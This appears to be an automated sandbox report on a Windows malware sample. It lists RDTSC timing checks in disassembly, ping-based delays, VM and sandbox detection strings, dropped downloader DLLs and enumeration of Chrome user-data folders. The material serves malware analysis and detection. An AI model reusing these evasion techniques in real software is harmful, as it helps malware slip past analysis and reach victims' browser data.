Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A2h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A0h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A6h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F018E second address: 00000000004F01B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A6h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F01B9 second address: 00000000004F01DA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A1h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F01E0 second address: 00000000004F0203 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A3h 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F0209 second address: 00000000004F0226 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F022C second address: 00000000004EFF9F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Eh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F8184DB1EE8h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFFA5 second address: 00000000004EFFC3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFFC9 second address: 00000000004EFFE5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004EFFEB second address: 00000000004F0007 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe RDTSC instruction interceptor: First address: 00000000004F000D second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A4h 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004EFAF0 rdtsc 1_2_004EFAF0
Contains functionality to query network adapater information
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: _memset,GetAdaptersInfo,_memset,_sprintf,CryptAcquireContextW,CryptCreateHash,CryptHashData,_memset,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,_sprintf,CryptDestroyHash,CryptReleaseContext, 1_2_00463680
Contains functionality to read device registry values (via SetupAPI)
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA, 3_2_10019780
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll Jump to dropped file
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_100204C0 3_2_100204C0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\N1yprTBBXs.exe TID: 6624 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe TID: 6996 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe TID: 7032 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Users\user\Desktop\N1yprTBBXs.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00410120 _memset,PathCombineW,_memset,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,FindClose, 1_2_00410120
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00413360 _memset,_memset,PathCombineW,FindFirstFileW,_memset,PathCombineW,DeleteFileW,GetLastError,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,MoveFileExW, 1_2_00413360
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_1001A170 FindFirstFileA,FindClose, 3_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\ Jump to behavior
Source: 6272167835D47591.exe, 00000003.00000002.308380151.0000000002C29000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}L
Source: 6272167835D47591.exe, 00000003.00000003.280686506.00000000042AA000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000003.00000003.261902511.0000000002C24000.00000004.00000040.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}L
Source: 6272167835D47591.exe, 00000005.00000003.264394295.0000000002B91000.00000004.00000001.sdmp Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: ecvFD59.tmp.10.dr Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20200930T144714Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=a0c75b5c4dbc42499bb53e37c1519be4&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663612&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663612&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 6272167835D47591.exe, 00000005.00000002.273258551.00000000008E8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWY
Source: 6272167835D47591.exe, 00000005.00000002.276025138.0000000002D79000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}q
Source: 6272167835D47591.exe, 00000003.00000003.282691211.00000000042DA000.00000004.00000001.sdmp Binary or memory string: SystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000003.00000003.282691211.00000000042DA000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.275675297.0000000002B96000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 6272167835D47591.exe, 00000005.00000002.273314986.0000000000944000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: 6272167835D47591.exe, 00000005.00000002.270501873.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware Virtual disk 2.0
Source: 6272167835D47591.exe, 00000003.00000003.261852856.0000000002F11000.00000004.00000001.sdmp Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}(
Source: 6272167835D47591.exe, 00000005.00000002.270501873.000000000019B000.00000004.00000010.sdmp Binary or memory string: VMware
Source: 6272167835D47591.exe, 00000003.00000003.282723190.00000000042C6000.00000004.00000001.sdmp Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}8
Source: 6272167835D47591.exe, 00000003.00000003.281081147.00000000042B6000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClass
Source: 6272167835D47591.exe, 00000003.00000002.308457561.0000000002F16000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.275675297.0000000002B96000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 6272167835D47591.exe, 00000003.00000003.280686506.00000000042AA000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}{0=
Source: 6272167835D47591.exe, 00000003.00000003.280864826.00000000042B0000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display 